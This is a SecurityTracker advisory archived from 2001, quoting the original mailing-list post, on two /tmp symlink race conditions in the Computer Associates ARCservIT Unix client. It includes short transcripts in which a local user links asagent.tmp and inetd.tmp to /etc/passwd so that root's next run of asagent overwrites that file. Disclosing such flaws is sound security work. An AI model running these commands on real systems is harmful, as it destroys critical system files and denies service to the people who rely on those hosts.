SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   CA ARCserve Backup Vendors:   CA
Computer Associates ARCserveIT Allows Local Users to Cause Any File on the Host to Be Overwritten
SecurityTracker Alert ID:  1001575
SecurityTracker URL:  http://securitytracker.com/id/1001575
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 18 2001
Impact:   Denial of service via local system
Exploit Included:  Yes  
Version(s): Client version 6.6x
Description:   A vulnerability has been reported in the Computer Associates ARCservIT storage management client that allows local users to cause any file on the system to be overwritten.

It is reported that there are two /tmp directory race condition vulnerabilities.

The first /tmp race vulnerability can only be triggered if the asagent client has never been executed. A local unprivileged user can create a symbolic link from the asagent.tmp file to any privileged file on the system. When the asagent is started (by the root user), the linked file will be overwritten. If the linked file was a critical file, this could create a denial of service condition.

A transcript demonstrating this first vulnerability follows:

As user:

je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd

In the second vulnerability, a similar situation exists but with the inetd.tmp file. Again, a local user can cause any file on the system to be overwritten when an authorized root user executes a certain command using asagent.

A transcript demonstrating this second vulnerability follows:

As user:

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent

The vendor has reportedly been informed.

Impact:   A local user can cause any file on the system to be overwritten. It appears that the user cannot specify the contents of the overwrite, so the end result is limited to a denial of service condition.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ca.com/arcserveit/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  tmp-races in ARCservIT Unix Client



Hi,

Computer Associates ARCservIT Client version 6.6x has atleast two /tmp
races, as following:

Vulnerability #1
-----------------

This tmp-race only works if the asagent client never been executed
before.

As user:

je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je@boxname~> ls -la /etc/passwd
-r--r--r--   1 0        sys            0 May  9 11:59 /etc/passwd


Vulnerability #2
-----------------

As user:

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent


Computer Associates has been informed.


Regards
Jonas Eriksson


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC